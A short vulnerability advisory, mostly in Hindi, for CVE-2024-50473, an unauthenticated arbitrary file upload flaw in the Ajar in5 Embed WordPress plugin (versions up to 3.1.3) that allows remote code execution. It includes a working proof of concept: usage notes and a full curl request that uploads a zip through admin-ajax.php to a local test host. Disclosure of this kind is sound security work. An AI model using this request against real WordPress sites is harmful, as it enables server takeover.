
Ajar in5 Embed <= 3.1.3 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
Ajar in5 Embed <= 3.1.3 - अनधिकृत मनमाना फ़ाइल अपलोड
WordPress के लिए Ajar in5 Embed प्लगइन सभी संस्करणों में, 3.1.3 तक और सहित, फ़ाइल प्रकार सत्यापन की कमी के कारण मनमाना फ़ाइल अपलोड के लिए असुरक्षित है। इससे अनधिकृत हमलावरों के लिए प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें अपलोड करना संभव हो जाता है, जिससे रिमोट कोड निष्पादन संभव हो सकता है।
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50473
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: ajar-productions-in5-embed
नोट: ज़िप फ़ाइल में एक index.html होना चाहिए भले ही वह खाली हो, और आपको 500 त्रुटि मिलेगी जो सामान्य है।
इसके लिए अपलोड की गई फ़ाइलें /wp-content/uploads/2024/php5/ में मिलेंगी - php5 बिना एक्सटेंशन के ज़िप फ़ाइल का नाम है।
curl -X POST "http://kubernetes.docker.internal/wp-admin/admin-ajax.php?action=in5&in5=upload" \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0" \
-H "Accept: application/json, text/javascript, */*; q=0.01" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate, br" \
-H "Referer: http://kubernetes.docker.internal/wp-admin/post.php?post=4142&action=edit" \
-H "X-Requested-With: XMLHttpRequest" \
-H "Content-Type: multipart/form-data" \
-F "customPath=wp-content/uploads/2024/" \
-F "files[]=@/path/to/php5.zip" \
--compressed